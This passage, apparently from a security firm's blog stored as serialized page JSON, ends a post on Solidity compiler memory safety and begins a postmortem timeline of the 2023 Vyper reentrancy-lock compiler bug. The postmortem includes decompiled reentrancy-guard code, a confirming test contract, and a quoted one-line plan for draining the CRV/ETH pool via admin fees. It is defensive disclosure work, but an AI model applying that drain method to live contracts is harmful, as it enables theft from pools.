",{"type":24,"tag":188,"props":36758,"children":36761},{"href":36759,"rel":36760},"https://blog.regehr.org/archives/1307",[192],[36762],{"type":30,"value":36763},"years down the line",{"type":30,"value":206},{"type":24,"tag":32,"props":36766,"children":36767},{},[36768,36770,36777,36778,36783],{"type":30,"value":36769},"Going back to Solidity, the specification makes ",{"type":24,"tag":188,"props":36771,"children":36774},{"href":36772,"rel":36773},"https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html",[192],[36775],{"type":30,"value":36776},"it unambiguously clear",{"type":30,"value":6319},{"type":24,"tag":5422,"props":36779,"children":36780},{},[36781],{"type":30,"value":36782},"Thou shalt not modify the zero slot",{"type":30,"value":206},{"type":24,"tag":9770,"props":36785,"children":36786},{},[36787],{"type":24,"tag":32,"props":36788,"children":36789},{},[36790],{"type":30,"value":36791},"The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).",{"type":24,"tag":32,"props":36793,"children":36794},{},[36795,36797,36802],{"type":30,"value":36796},"Any code that touches the zero slot at 0x60 is very clearly violating the specification. Does this matter though? This is where the semantics between Solidity and YUL gets tricky. Recall that the zero slot is a construction ",{"type":24,"tag":5422,"props":36798,"children":36799},{},[36800],{"type":30,"value":36801},"in Solidity",{"type":30,"value":206},{"type":24,"tag":32,"props":36804,"children":36805},{},[36806],{"type":30,"value":36807},"Even though there's no explicit guarantee that inline assembly will be emitted verbatim during generation",{"type":24,"tag":6246,"props":36809,"children":36810},{},[36811],{"type":24,"tag":2659,"props":36812,"children":36813},{},[36814,36816,36823],{"type":30,"value":36815},"It very clearly ",{"type":24,"tag":188,"props":36817,"children":36820},{"href":36818,"rel":36819},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGeneratorForStatements.cpp#L2216",[192],[36821],{"type":30,"value":36822},"holds true today",{"type":30,"value":206},{"type":24,"tag":291,"props":36825,"children":36827},{"className":35866,"code":36826,"language":35868,"meta":7,"style":7},"bool IRGeneratorForStatements::visit(InlineAssembly const& _inlineAsm)\n{\n setLocation(_inlineAsm);\n if (*_inlineAsm.annotation().hasMemoryEffects && !_inlineAsm.annotation().markedMemorySafe)\n m_context.setMemoryUnsafeInlineAssemblySeen();\n CopyTranslate bodyCopier{_inlineAsm.dialect(), m_context, _inlineAsm.annotation().externalReferences};\n\n yul::Statement modified = bodyCopier(_inlineAsm.operations());`\n",[36828],{"type":24,"tag":145,"props":36829,"children":36830},{"__ignoreMap":7},[36831,36871,36878,36891,36963,36984,37035,37042],{"type":24,"tag":301,"props":36832,"children":36833},{"class":303,"line":304},[36834,36838,36843,36848,36852,36857,36862,36867],{"type":24,"tag":301,"props":36835,"children":36836},{"style":348},[36837],{"type":30,"value":36442},{"type":24,"tag":301,"props":36839,"children":36840},{"style":359},[36841],{"type":30,"value":36842}," IRGeneratorForStatements::",{"type":24,"tag":301,"props":36844,"children":36845},{"style":314},[36846],{"type":30,"value":36847},"visit",{"type":24,"tag":301,"props":36849,"children":36850},{"style":359},[36851],{"type":30,"value":362},{"type":24,"tag":301,"props":36853,"children":36854},{"style":10246},[36855],{"type":30,"value":36856},"InlineAssembly",{"type":24,"tag":301,"props":36858,"children":36859},{"style":348},[36860],{"type":30,"value":36861}," const&",{"type":24,"tag":301,"props":36863,"children":36864},{"style":369},[36865],{"type":30,"value":36866}," _inlineAsm",{"type":24,"tag":301,"props":36868,"children":36869},{"style":359},[36870],{"type":30,"value":791},{"type":24,"tag":301,"props":36872,"children":36873},{"class":303,"line":320},[36874],{"type":24,"tag":301,"props":36875,"children":36876},{"style":359},[36877],{"type":30,"value":799},{"type":24,"tag":301,"props":36879,"children":36880},{"class":303,"line":335},[36881,36886],{"type":24,"tag":301,"props":36882,"children":36883},{"style":314},[36884],{"type":30,"value":36885}," setLocation",{"type":24,"tag":301,"props":36887,"children":36888},{"style":359},[36889],{"type":30,"value":36890},"(_inlineAsm);\n",{"type":24,"tag":301,"props":36892,"children":36893},{"class":303,"line":344},[36894,36898,36902,36906,36911,36915,36920,36925,36930,36934,36938,36942,36946,36950,36954,36959],{"type":24,"tag":301,"props":36895,"children":36896},{"style":308},[36897],{"type":30,"value":453},{"type":24,"tag":301,"props":36899,"children":36900},{"style":359},[36901],{"type":30,"value":873},{"type":24,"tag":301,"props":36903,"children":36904},{"style":385},[36905],{"type":30,"value":772},{"type":24,"tag":301,"props":36907,"children":36908},{"style":369},[36909],{"type":30,"value":36910},"_inlineAsm",{"type":24,"tag":301,"props":36912,"children":36913},{"style":359},[36914],{"type":30,"value":206},{"type":24,"tag":301,"props":36916,"children":36917},{"style":314},[36918],{"type":30,"value":36919},"annotation",{"type":24,"tag":301,"props":36921,"children":36922},{"style":359},[36923],{"type":30,"value":36924},"().",{"type":24,"tag":301,"props":36926,"children":36927},{"style":369},[36928],{"type":30,"value":36929},"hasMemoryEffects",{"type":24,"tag":301,"props":36931,"children":36932},{"style":385},[36933],{"type":30,"value":20977},{"type":24,"tag":301,"props":36935,"children":36936},{"style":385},[36937],{"type":30,"value":19659},{"type":24,"tag":301,"props":36939,"children":36940},{"style":369},[36941],{"type":30,"value":36910},{"type":24,"tag":301,"props":36943,"children":36944},{"style":359},[36945],{"type":30,"value":206},{"type":24,"tag":301,"props":36947,"children":36948},{"style":314},[36949],{"type":30,"value":36919},{"type":24,"tag":301,"props":36951,"children":36952},{"style":359},[36953],{"type":30,"value":36924},{"type":24,"tag":301,"props":36955,"children":36956},{"style":369},[36957],{"type":30,"value":36958},"markedMemorySafe",{"type":24,"tag":301,"props":36960,"children":36961},{"style":359},[36962],{"type":30,"value":791},{"type":24,"tag":301,"props":36964,"children":36965},{"class":303,"line":401},[36966,36971,36975,36980],{"type":24,"tag":301,"props":36967,"children":36968},{"style":369},[36969],{"type":30,"value":36970}," m_context",{"type":24,"tag":301,"props":36972,"children":36973},{"style":359},[36974],{"type":30,"value":206},{"type":24,"tag":301,"props":36976,"children":36977},{"style":314},[36978],{"type":30,"value":36979},"setMemoryUnsafeInlineAssemblySeen",{"type":24,"tag":301,"props":36981,"children":36982},{"style":359},[36983],{"type":30,"value":4859},{"type":24,"tag":301,"props":36985,"children":36986},{"class":303,"line":415},[36987,36992,36996,37000,37005,37010,37014,37018,37022,37026,37031],{"type":24,"tag":301,"props":36988,"children":36989},{"style":359},[36990],{"type":30,"value":36991}," CopyTranslate bodyCopier{",{"type":24,"tag":301,"props":36993,"children":36994},{"style":369},[36995],{"type":30,"value":36910},{"type":24,"tag":301,"props":36997,"children":36998},{"style":359},[36999],{"type":30,"value":206},{"type":24,"tag":301,"props":37001,"children":37002},{"style":314},[37003],{"type":30,"value":37004},"dialect",{"type":24,"tag":301,"props":37006,"children":37007},{"style":359},[37008],{"type":30,"value":37009},"(), m_context, ",{"type":24,"tag":301,"props":37011,"children":37012},{"style":369},[37013],{"type":30,"value":36910},{"type":24,"tag":301,"props":37015,"children":37016},{"style":359},[37017],{"type":30,"value":206},{"type":24,"tag":301,"props":37019,"children":37020},{"style":314},[37021],{"type":30,"value":36919},{"type":24,"tag":301,"props":37023,"children":37024},{"style":359},[37025],{"type":30,"value":36924},{"type":24,"tag":301,"props":37027,"children":37028},{"style":369},[37029],{"type":30,"value":37030},"externalReferences",{"type":24,"tag":301,"props":37032,"children":37033},{"style":359},[37034],{"type":30,"value":3118},{"type":24,"tag":301,"props":37036,"children":37037},{"class":303,"line":439},[37038],{"type":24,"tag":301,"props":37039,"children":37040},{"emptyLinePlaceholder":16},[37041],{"type":30,"value":341},{"type":24,"tag":301,"props":37043,"children":37044},{"class":303,"line":447},[37045,37050,37054,37059,37063,37067,37071,37076],{"type":24,"tag":301,"props":37046,"children":37047},{"style":359},[37048],{"type":30,"value":37049}," yul::Statement modified ",{"type":24,"tag":301,"props":37051,"children":37052},{"style":385},[37053],{"type":30,"value":523},{"type":24,"tag":301,"props":37055,"children":37056},{"style":314},[37057],{"type":30,"value":37058}," bodyCopier",{"type":24,"tag":301,"props":37060,"children":37061},{"style":359},[37062],{"type":30,"value":362},{"type":24,"tag":301,"props":37064,"children":37065},{"style":369},[37066],{"type":30,"value":36910},{"type":24,"tag":301,"props":37068,"children":37069},{"style":359},[37070],{"type":30,"value":206},{"type":24,"tag":301,"props":37072,"children":37073},{"style":314},[37074],{"type":30,"value":37075},"operations",{"type":24,"tag":301,"props":37077,"children":37078},{"style":359},[37079],{"type":30,"value":37080},"());`\n",{"type":24,"tag":6246,"props":37082,"children":37083},{"start":320},[37084],{"type":24,"tag":2659,"props":37085,"children":37086},{},[37087],{"type":30,"value":37088},"It would require a pretty contrived compiler implementation to meaningfully modify assembly statements before optimization.",{"type":24,"tag":32,"props":37090,"children":37091},{},[37092],{"type":30,"value":37093},"As long as the invariants are upheld before and after the assembly block executes, the code is probably safe.",{"type":24,"tag":43,"props":37095,"children":37096},{"id":12133},[37097],{"type":30,"value":12136},{"type":24,"tag":32,"props":37099,"children":37100},{},[37101],{"type":30,"value":37102},"In this blog post, we present an exploration of the Solidity compiler. This aims to serve as a useful reference for the inquisitive. Compilers are extremely complex with implicit and explicit assumptions. When in doubt, read the source code. So what exactly is memory safety?",{"type":24,"tag":32,"props":37104,"children":37105},{},[37106],{"type":30,"value":37107},"It's a promise between YUL generation and optimization.",{"type":24,"tag":25200,"props":37109,"children":37111},{"className":37110,"dataFootnotes":7},[25203],[37112,37117],{"type":24,"tag":43,"props":37113,"children":37115},{"className":37114,"id":22269},[25208],[37116],{"type":30,"value":25211},{"type":24,"tag":6246,"props":37118,"children":37119},{},[37120,37154],{"type":24,"tag":2659,"props":37121,"children":37123},{"id":37122},"user-content-fn-1",[37124,37126,37131,37133,37139,37141,37146,37148],{"type":30,"value":37125},"As an interesting aside, ",{"type":24,"tag":145,"props":37127,"children":37129},{"className":37128},[],[37130],{"type":30,"value":36127},{"type":30,"value":37132}," is an opaque function which prevents optimizations from reasoning about the free memory pointer. This leads to some rather counterintitive behavior -- ",{"type":24,"tag":145,"props":37134,"children":37136},{"className":37135},[],[37137],{"type":30,"value":37138},"memory-unsafe",{"type":30,"value":37140}," code can ",{"type":24,"tag":5422,"props":37142,"children":37143},{},[37144],{"type":30,"value":37145},"decrease",{"type":30,"value":37147}," gas consumption, especially in the YUL header. ",{"type":24,"tag":188,"props":37149,"children":37152},{"href":37150,"ariaLabel":25313,"className":37151,"dataFootnoteBackref":7},"#user-content-fnref-1",[25315],[37153],{"type":30,"value":25318},{"type":24,"tag":2659,"props":37155,"children":37157},{"id":37156},"user-content-fn-2",[37158,37160,37165,37167],{"type":30,"value":37159},"Unfortunately the documentation only presents a \"non-exhaustive list of restrictions\" on verbatim bytecode. In practice, it seems hard to ",{"type":24,"tag":5422,"props":37161,"children":37162},{},[37163],{"type":30,"value":37164},"guarantee",{"type":30,"value":37166}," behavior with opaque bytes. ",{"type":24,"tag":188,"props":37168,"children":37171},{"href":37169,"ariaLabel":25333,"className":37170,"dataFootnoteBackref":7},"#user-content-fnref-2",[25315],[37172],{"type":30,"value":25318},{"type":24,"tag":9672,"props":37174,"children":37175},{},[37176],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":37178},[37179,37180,37181,37182,37183,37184,37185],{"id":35771,"depth":320,"text":35774},{"id":35825,"depth":320,"text":35828},{"id":36089,"depth":320,"text":36092},{"id":35820,"depth":320,"text":36313},{"id":36659,"depth":320,"text":36662},{"id":12133,"depth":320,"text":12136},{"id":22269,"depth":320,"text":25211},"content:blog:2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety",{"_path":37190,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":37191,"description":37192,"author":12540,"image":37193,"date":37195,"isFeatured":16,"onBlogPage":16,"tags":37196,"body":37198,"_type":9700,"_id":37948,"_source":9702,"_file":37949,"_stem":37950,"_extension":9705},"/blog/2023-08-01-vyper-timeline","Vyper Hack Timeline","A timeline and postmortem for the Vyper compiler bug. Thoughts on trust assumptions, vulnerability disclosures, and whitehack recoveries.",{"src":37194,"height":15,"width":15},"/posts/vyper-timeline/header.jpg","2023-08-01",[37197,35766],"vyper",{"type":21,"children":37199,"toc":37939},[37200,37205,37210,37215,37221,37226,37244,37254,37259,37267,37277,37296,37376,37386,37545,37550,37555,37565,37572,37577,37582,37596,37601,37618,37635,37654,37664,37677,37682,37695,37700,37705,37715,37742,37752,37782,37788,37797,37803,37808,37813,37818,37824,37829,37843,37848,37853,37858,37864,37869,37882,37908,37913,37935],{"type":24,"tag":32,"props":37201,"children":37202},{},[37203],{"type":30,"value":37204},"\"Trust but verify\" is a common adage. \"Hindsight is 20/20\" is another one. The best bugs are those hiding in plain sight.",{"type":24,"tag":32,"props":37206,"children":37207},{},[37208],{"type":30,"value":37209},"Compiler bugs are located deep in the supply chain, making their effects far more widespread than normal protocol bugs. Numerous contracts across different chains were compiled with vulnerable Vyper versions - it was a race against blackhats.",{"type":24,"tag":32,"props":37211,"children":37212},{},[37213],{"type":30,"value":37214},"Here's how it all happened.",{"type":24,"tag":43,"props":37216,"children":37218},{"id":37217},"timeline",[37219],{"type":30,"value":37220},"Timeline",{"type":24,"tag":32,"props":37222,"children":37223},{},[37224],{"type":30,"value":37225},"As a note, I'll use the \"we\" pronoun loosely here. I think I personally made some insightful contributions towards the initial vulnerability discovery but countless others helped far more throughout the entire process.",{"type":24,"tag":32,"props":37227,"children":37228},{},[37229,37234,37236,37243],{"type":24,"tag":60,"props":37230,"children":37231},{},[37232],{"type":30,"value":37233},"13:10 UTC",{"type":30,"value":37235}," pETH/ETH was ",{"type":24,"tag":188,"props":37237,"children":37240},{"href":37238,"rel":37239},"https://etherscan.io/tx/0xa84aa065ce61dbb1eb50ab6ae67fc31a9da50dd2c74eefd561661bfce2f1620c",[192],[37241],{"type":30,"value":37242},"drained of $11M",{"type":30,"value":206},{"type":24,"tag":32,"props":37245,"children":37246},{},[37247,37252],{"type":24,"tag":60,"props":37248,"children":37249},{},[37250],{"type":30,"value":37251},"13:19 UTC",{"type":30,"value":37253}," Michal posted in ETHSecurity about a sudden drop in pETH price.",{"type":24,"tag":32,"props":37255,"children":37256},{},[37257],{"type":30,"value":37258},"Igor first noticed something was off. Thanks to him, we dug deeper.",{"type":24,"tag":9770,"props":37260,"children":37261},{},[37262],{"type":24,"tag":32,"props":37263,"children":37264},{},[37265],{"type":30,"value":37266},"But how did the bot reenter into add_liquidity() from remove_liquidity()?",{"type":24,"tag":32,"props":37268,"children":37269},{},[37270,37275],{"type":24,"tag":60,"props":37271,"children":37272},{},[37273],{"type":30,"value":37274},"14:01 UTC",{"type":30,"value":37276}," A warroom was formed around this comment.",{"type":24,"tag":32,"props":37278,"children":37279},{},[37280,37285,37287,37294],{"type":24,"tag":60,"props":37281,"children":37282},{},[37283],{"type":30,"value":37284},"14:07 UTC",{"type":30,"value":37286}," We decompiled the JPEGd contract ",{"type":24,"tag":188,"props":37288,"children":37291},{"href":37289,"rel":37290},"https://ethervm.io/decompile",[192],[37292],{"type":30,"value":37293},"with our favorite decompiler",{"type":30,"value":37295}," and noted a difference in reentrancy guard storage slot.",{"type":24,"tag":291,"props":37297,"children":37301},{"className":37298,"code":37299,"language":37300,"meta":7,"style":7},"language-yul shiki shiki-themes slack-dark","// Dispatch table entry for add_liquidity(uint256[2],uint256)\nlabel_0057:\n if (storage[0x00]) { revert(memory[0x00:0x00]); }\n storage[0x00] = 0x01;\n\n// Dispatch table entry for remove_liquidity(uint256,uint256[2])\nlabel_1AF3:\n if (storage[0x02]) { revert(memory[0x00:0x00]); }\n storage[0x02] = 0x01;\n","yul",[37302],{"type":24,"tag":145,"props":37303,"children":37304},{"__ignoreMap":7},[37305,37313,37321,37329,37337,37344,37352,37360,37368],{"type":24,"tag":301,"props":37306,"children":37307},{"class":303,"line":304},[37308],{"type":24,"tag":301,"props":37309,"children":37310},{},[37311],{"type":30,"value":37312},"// Dispatch table entry for add_liquidity(uint256[2],uint256)\n",{"type":24,"tag":301,"props":37314,"children":37315},{"class":303,"line":320},[37316],{"type":24,"tag":301,"props":37317,"children":37318},{},[37319],{"type":30,"value":37320},"label_0057:\n",{"type":24,"tag":301,"props":37322,"children":37323},{"class":303,"line":335},[37324],{"type":24,"tag":301,"props":37325,"children":37326},{},[37327],{"type":30,"value":37328}," if (storage[0x00]) { revert(memory[0x00:0x00]); }\n",{"type":24,"tag":301,"props":37330,"children":37331},{"class":303,"line":344},[37332],{"type":24,"tag":301,"props":37333,"children":37334},{},[37335],{"type":30,"value":37336}," storage[0x00] = 0x01;\n",{"type":24,"tag":301,"props":37338,"children":37339},{"class":303,"line":401},[37340],{"type":24,"tag":301,"props":37341,"children":37342},{"emptyLinePlaceholder":16},[37343],{"type":30,"value":341},{"type":24,"tag":301,"props":37345,"children":37346},{"class":303,"line":415},[37347],{"type":24,"tag":301,"props":37348,"children":37349},{},[37350],{"type":30,"value":37351},"// Dispatch table entry for remove_liquidity(uint256,uint256[2])\n",{"type":24,"tag":301,"props":37353,"children":37354},{"class":303,"line":439},[37355],{"type":24,"tag":301,"props":37356,"children":37357},{},[37358],{"type":30,"value":37359},"label_1AF3:\n",{"type":24,"tag":301,"props":37361,"children":37362},{"class":303,"line":447},[37363],{"type":24,"tag":301,"props":37364,"children":37365},{},[37366],{"type":30,"value":37367}," if (storage[0x02]) { revert(memory[0x00:0x00]); }\n",{"type":24,"tag":301,"props":37369,"children":37370},{"class":303,"line":476},[37371],{"type":24,"tag":301,"props":37372,"children":37373},{},[37374],{"type":30,"value":37375}," storage[0x02] = 0x01;\n",{"type":24,"tag":32,"props":37377,"children":37378},{},[37379,37384],{"type":24,"tag":60,"props":37380,"children":37381},{},[37382],{"type":30,"value":37383},"14:27 UTC",{"type":30,"value":37385}," We confirmed this behavior with a simple local test contract.",{"type":24,"tag":291,"props":37387,"children":37389},{"className":9220,"code":37388,"language":9219,"meta":7,"style":7},"@external\n@nonreentrant(\"lock\")\ndef test(addr: address) -> bool:\n return True\n\n@external\n@nonreentrant(\"lock\")\ndef test2(addr: address) -> bool:\n return False\n",[37390],{"type":24,"tag":145,"props":37391,"children":37392},{"__ignoreMap":7},[37393,37401,37422,37456,37468,37475,37482,37501,37533],{"type":24,"tag":301,"props":37394,"children":37395},{"class":303,"line":304},[37396],{"type":24,"tag":301,"props":37397,"children":37398},{"style":314},[37399],{"type":30,"value":37400},"@external\n",{"type":24,"tag":301,"props":37402,"children":37403},{"class":303,"line":320},[37404,37409,37413,37418],{"type":24,"tag":301,"props":37405,"children":37406},{"style":314},[37407],{"type":30,"value":37408},"@nonreentrant",{"type":24,"tag":301,"props":37410,"children":37411},{"style":359},[37412],{"type":30,"value":362},{"type":24,"tag":301,"props":37414,"children":37415},{"style":329},[37416],{"type":30,"value":37417},"\"lock\"",{"type":24,"tag":301,"props":37419,"children":37420},{"style":359},[37421],{"type":30,"value":791},{"type":24,"tag":301,"props":37423,"children":37424},{"class":303,"line":335},[37425,37430,37435,37439,37443,37448,37452],{"type":24,"tag":301,"props":37426,"children":37427},{"style":348},[37428],{"type":30,"value":37429},"def",{"type":24,"tag":301,"props":37431,"children":37432},{"style":314},[37433],{"type":30,"value":37434}," test",{"type":24,"tag":301,"props":37436,"children":37437},{"style":359},[37438],{"type":30,"value":362},{"type":24,"tag":301,"props":37440,"children":37441},{"style":369},[37442],{"type":30,"value":7765},{"type":24,"tag":301,"props":37444,"children":37445},{"style":359},[37446],{"type":30,"value":37447},": address) -> ",{"type":24,"tag":301,"props":37449,"children":37450},{"style":10246},[37451],{"type":30,"value":36442},{"type":24,"tag":301,"props":37453,"children":37454},{"style":359},[37455],{"type":30,"value":12388},{"type":24,"tag":301,"props":37457,"children":37458},{"class":303,"line":344},[37459,37463],{"type":24,"tag":301,"props":37460,"children":37461},{"style":308},[37462],{"type":30,"value":680},{"type":24,"tag":301,"props":37464,"children":37465},{"style":348},[37466],{"type":30,"value":37467}," True\n",{"type":24,"tag":301,"props":37469,"children":37470},{"class":303,"line":401},[37471],{"type":24,"tag":301,"props":37472,"children":37473},{"emptyLinePlaceholder":16},[37474],{"type":30,"value":341},{"type":24,"tag":301,"props":37476,"children":37477},{"class":303,"line":415},[37478],{"type":24,"tag":301,"props":37479,"children":37480},{"style":314},[37481],{"type":30,"value":37400},{"type":24,"tag":301,"props":37483,"children":37484},{"class":303,"line":439},[37485,37489,37493,37497],{"type":24,"tag":301,"props":37486,"children":37487},{"style":314},[37488],{"type":30,"value":37408},{"type":24,"tag":301,"props":37490,"children":37491},{"style":359},[37492],{"type":30,"value":362},{"type":24,"tag":301,"props":37494,"children":37495},{"style":329},[37496],{"type":30,"value":37417},{"type":24,"tag":301,"props":37498,"children":37499},{"style":359},[37500],{"type":30,"value":791},{"type":24,"tag":301,"props":37502,"children":37503},{"class":303,"line":447},[37504,37508,37513,37517,37521,37525,37529],{"type":24,"tag":301,"props":37505,"children":37506},{"style":348},[37507],{"type":30,"value":37429},{"type":24,"tag":301,"props":37509,"children":37510},{"style":314},[37511],{"type":30,"value":37512}," test2",{"type":24,"tag":301,"props":37514,"children":37515},{"style":359},[37516],{"type":30,"value":362},{"type":24,"tag":301,"props":37518,"children":37519},{"style":369},[37520],{"type":30,"value":7765},{"type":24,"tag":301,"props":37522,"children":37523},{"style":359},[37524],{"type":30,"value":37447},{"type":24,"tag":301,"props":37526,"children":37527},{"style":10246},[37528],{"type":30,"value":36442},{"type":24,"tag":301,"props":37530,"children":37531},{"style":359},[37532],{"type":30,"value":12388},{"type":24,"tag":301,"props":37534,"children":37535},{"class":303,"line":476},[37536,37540],{"type":24,"tag":301,"props":37537,"children":37538},{"style":308},[37539],{"type":30,"value":680},{"type":24,"tag":301,"props":37541,"children":37542},{"style":348},[37543],{"type":30,"value":37544}," False\n",{"type":24,"tag":32,"props":37546,"children":37547},{},[37548],{"type":30,"value":37549},"This was not just another reentrancy bug.",{"type":24,"tag":32,"props":37551,"children":37552},{},[37553],{"type":30,"value":37554},"At this point, we realized just how impactful this would be. There was a blackout of information, and we deleted public messages on the nature of the vulnerability.",{"type":24,"tag":32,"props":37556,"children":37557},{},[37558,37563],{"type":24,"tag":60,"props":37559,"children":37560},{},[37561],{"type":30,"value":37562},"14:37 UTC",{"type":30,"value":37564}," Wavey helped identify the vulnerable commit and affected versions. This was also confirmed by me and Charles by manually inspecting the Vyper compiler output.",{"type":24,"tag":32,"props":37566,"children":37567},{},[37568],{"type":24,"tag":177,"props":37569,"children":37571},{"alt":7,"src":37570},"/posts/vyper-timeline/sstore.png",[],{"type":24,"tag":32,"props":37573,"children":37574},{},[37575],{"type":30,"value":37576},"It was a race with the hackers.",{"type":24,"tag":32,"props":37578,"children":37579},{},[37580],{"type":30,"value":37581},"Thankfully, people were still confusing this for read-only reentrancy. Taken from the \"Web3 Security Alerts\" channel.",{"type":24,"tag":9770,"props":37583,"children":37584},{},[37585],{"type":24,"tag":32,"props":37586,"children":37587},{},[37588,37590],{"type":30,"value":37589},"Alchemix and Metronome DAO also been hacked due to this read-only reentrancy bug: ",{"type":24,"tag":188,"props":37591,"children":37594},{"href":37592,"rel":37593},"https://twitter.com/hexagate_/status/1685677801813217280",[192],[37595],{"type":30,"value":37592},{"type":24,"tag":32,"props":37597,"children":37598},{},[37599],{"type":30,"value":37600},"Michael identified alETH and msETH pools, which were also running 0.2.15, as being also potentially vulnerable.",{"type":24,"tag":32,"props":37602,"children":37603},{},[37604,37609,37610,37617],{"type":24,"tag":60,"props":37605,"children":37606},{},[37607],{"type":30,"value":37608},"14:50 UTC",{"type":30,"value":13277},{"type":24,"tag":188,"props":37611,"children":37614},{"href":37612,"rel":37613},"https://etherscan.io/tx/0xc93eb238ff42632525e990119d3edc7775299a70b56e54d83ec4f53736400964",[192],[37615],{"type":30,"value":37616},"msETH/ETH was drained",{"type":30,"value":206},{"type":24,"tag":32,"props":37619,"children":37620},{},[37621,37626,37627,37634],{"type":24,"tag":60,"props":37622,"children":37623},{},[37624],{"type":30,"value":37625},"15:34 UTC",{"type":30,"value":13277},{"type":24,"tag":188,"props":37628,"children":37631},{"href":37629,"rel":37630},"https://etherscan.io/tx/0xb676d789bb8b66a08105c844a49c2bcffb400e5c1cfabd4bc30cca4bff3c9801",[192],[37632],{"type":30,"value":37633},"alETH/ETH was drained",{"type":30,"value":206},{"type":24,"tag":32,"props":37636,"children":37637},{},[37638,37643,37645,37652],{"type":24,"tag":60,"props":37639,"children":37640},{},[37641],{"type":30,"value":37642},"15:43 UTC",{"type":30,"value":37644}," We identified that ",{"type":24,"tag":188,"props":37646,"children":37649},{"href":37647,"rel":37648},"https://etherscan.io/address/0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511#code",[192],[37650],{"type":30,"value":37651},"CRV/ETH was vulnerable",{"type":30,"value":37653},", compiled using Vyper version 3.0.0. It was critical that we kept the nature of affected contracts secret for as long as possible.",{"type":24,"tag":32,"props":37655,"children":37656},{},[37657,37662],{"type":24,"tag":60,"props":37658,"children":37659},{},[37660],{"type":30,"value":37661},"16:11 UTC",{"type":30,"value":37663}," We began working on a whitehat exploit.",{"type":24,"tag":32,"props":37665,"children":37666},{},[37667,37669,37676],{"type":30,"value":37668},"Unfortunately, too many groups were doing independent research in parallel and rumors were spreading. At 16:44 UTC, we decided to release a ",{"type":24,"tag":188,"props":37670,"children":37673},{"href":37671,"rel":37672},"https://twitter.com/vyperlang/status/1685692973051498497",[192],[37674],{"type":30,"value":37675},"public statement on affected versions",{"type":30,"value":206},{"type":24,"tag":32,"props":37678,"children":37679},{},[37680],{"type":30,"value":37681},"By 18:32 UTC, we had a proof of concept exploit to be used in a potential whitehat recovery. bpak from Chainlight was also working on an exploit in parallel, and shared it at 19:06 UTC.",{"type":24,"tag":32,"props":37683,"children":37684},{},[37685,37687,37694],{"type":30,"value":37686},"Five minutes later at 19:11 UTC, ",{"type":24,"tag":188,"props":37688,"children":37691},{"href":37689,"rel":37690},"https://etherscan.io/tx/0x2e7dc8b2fb7e25fd00ed9565dcc0ad4546363171d5e00f196d48103983ae477c",[192],[37692],{"type":30,"value":37693},"somebody else stole the funds",{"type":30,"value":206},{"type":24,"tag":32,"props":37696,"children":37697},{},[37698],{"type":30,"value":37699},"The attack structure was largely different from either of our proofs of concept, so it was unlikely to have been a leak from our group. Regardless, this was pretty demoralizing.",{"type":24,"tag":32,"props":37701,"children":37702},{},[37703],{"type":30,"value":37704},"Nevertheless, there was more ground to cover.",{"type":24,"tag":32,"props":37706,"children":37707},{},[37708,37713],{"type":24,"tag":60,"props":37709,"children":37710},{},[37711],{"type":30,"value":37712},"21:26 UTC",{"type":30,"value":37714}," Addison proposed an ambitious plan to recover the remaining assets in the CRVETH pool.",{"type":24,"tag":9770,"props":37716,"children":37717},{},[37718],{"type":24,"tag":32,"props":37719,"children":37720},{},[37721,37723,37727,37729,37732,37734,37737,37739],{"type":30,"value":37722},"if you send like 30k crv to the crv/eth pool ",{"type":24,"tag":37724,"props":37725,"children":37726},"br",{},[],{"type":30,"value":37728},"\nyou can then update admin fee ",{"type":24,"tag":37724,"props":37730,"children":37731},{},[],{"type":30,"value":37733},"\nand then the crv/eth rate is like .15 eth per crv ",{"type":24,"tag":37724,"props":37735,"children":37736},{},[],{"type":30,"value":37738},"\nso you can basically drain whole pool for few hundred K crv ",{"type":24,"tag":37724,"props":37740,"children":37741},{},[],{"type":24,"tag":32,"props":37743,"children":37744},{},[37745,37750],{"type":24,"tag":60,"props":37746,"children":37747},{},[37748],{"type":30,"value":37749},"21:52 UTC",{"type":30,"value":37751}," bpak had produced a working proof of concept which could recover 3100 ETH.",{"type":24,"tag":32,"props":37753,"children":37754},{},[37755,37757,37764,37766,37773,37781],{"type":30,"value":37756},"Ten minutes later at 22:02 UTC, we were beaten again. By some freak concidence, the ",{"type":24,"tag":188,"props":37758,"children":37761},{"href":37759,"rel":37760},"https://etherscan.io/address/0x8c73d39b2da2dd1a10cc16502bc7c8d768ec74c9",[192],[37762],{"type":30,"value":37763},"CRV admin fee bot",{"type":30,"value":37765}," had claimed fees and ",{"type":24,"tag":188,"props":37767,"children":37770},{"href":37768,"rel":37769},"https://etherscan.io/tx/0xcd99fadd7e28a42a063e07d9d86f67c88e10a7afe5921bd28cd1124924ae2052",[192],[37771],{"type":30,"value":37772},"the pool was drained",{"type":24,"tag":22262,"props":37774,"children":37775},{},[37776],{"type":24,"tag":188,"props":37777,"children":37779},{"href":36380,"ariaDescribedBy":37778,"dataFootnoteRef":7,"id":36382},[22269],[37780],{"type":30,"value":546},{"type":30,"value":206},{"type":24,"tag":43,"props":37783,"children":37785},{"id":37784},"blame",[37786],{"type":30,"value":37787},"Blame",{"type":24,"tag":32,"props":37789,"children":37790},{},[37791,37795],{"type":24,"tag":5422,"props":37792,"children":37793},{},[37794],{"type":30,"value":37787},{"type":30,"value":37796}," is a strong word. It's not productive to point fingers. At the same time, I think it's useful to think about what could have went better.",{"type":24,"tag":80,"props":37798,"children":37800},{"id":37799},"races",[37801],{"type":30,"value":37802},"Races",{"type":24,"tag":32,"props":37804,"children":37805},{},[37806],{"type":30,"value":37807},"In both cases, whitehat efforts were beaten by less than half an hour. Sometimes every second really does count.",{"type":24,"tag":32,"props":37809,"children":37810},{},[37811],{"type":30,"value":37812},"There likely could have been better preparation and resources for executing on these attacks. At the same time, this seems like a double-edged sword. Is it really a good idea to aggregate information related how to execute a hack? Who should we trust?",{"type":24,"tag":32,"props":37814,"children":37815},{},[37816],{"type":30,"value":37817},"On the other hand, I think the process was quite efficient. We went from initial suspicions to identifying vulnerable variants in 2 hours and 4 